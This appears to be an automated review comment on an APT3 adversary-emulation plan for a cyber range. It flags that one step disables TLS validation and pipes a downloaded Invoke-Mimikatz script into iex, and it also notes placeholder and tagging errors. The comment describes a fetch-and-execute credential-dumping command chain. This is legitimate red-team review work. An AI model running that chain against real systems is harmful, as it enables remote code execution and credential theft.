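Review bot: Phase 15 (id `effbedc1-…`) is the only step in this file that fetches its tooling at run time — it sets `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }` and feeds a `DownloadString` of Invoke-Mimikatz from raw.githubusercontent.com straight into `iex` — so what executes on the range is whatever that URL serves on the day, with TLS validation disabled and no hash check, which makes the emulation non-reproducible and adds a supply-chain dependency the exercise is not meant to be testing. Every other scripted step in this plan ships its script as a `payloads:` entry; doing the same here (`. .\Invoke-Mimikatz.ps1;` in both `command:` blocks and `- Invoke-Mimikatz.ps1` under `payloads:`, as the APT29 plan's Step 20 already does) removes both the certificate bypass and the network fetch. Two smaller items in the same hunk: `adversary_description: APT3 (...)` at the top of the file is still a placeholder, and Phase 16 uses `tactic: defensive-evasion` where every other entry uses the ATT&CK shortname form, so `defense-evasion` is presumably intended. The `cti_source` values throughout point at Dukes/APT29 reporting (the F-Secure Dukes whitepaper, "No Easy Breach", the CrowdStrike "Bears in the Midst" post) rather than APT3 reporting, which looks like carry-over from the APT29 plan and is worth confirming before this ships.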